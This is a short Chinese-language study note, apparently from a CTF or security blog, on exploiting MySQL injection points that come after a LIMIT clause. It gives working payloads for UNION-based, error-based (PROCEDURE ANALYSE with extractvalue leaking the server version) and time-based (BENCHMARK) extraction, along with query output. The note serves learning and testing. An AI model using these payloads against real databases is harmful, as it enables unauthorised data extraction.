0x01总结一下
这种类型一般实际情况中在参数为start返回一些结果变量的时候,或者其他一些情况,在ctf中也比较多
没有order by
可以跟union select 进行查询
mysql> select user from users limit 0,1 union select user from users;
+-------+
| user |
+-------+
| admin |
| test |
| sp4rk |
| qwer |
+-------+
有 order by
这里具体原理可以参考文章 Mysql注入点在limit关键字后面的利用方法
mysql> select user from users order by user_id limit 0,4 procedure analyse(extractvalue(1,concat(0x5e24,version(),0x5e24)),1);
ERROR 1105 (HY000): XPATH syntax error: '^$5.5.53^$'
基于时间
select user from users order by user_id limit 0,4 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,BENCHMARK(5,SHA1(1)),1))))),1);
不知道为什么我这里并没有延时....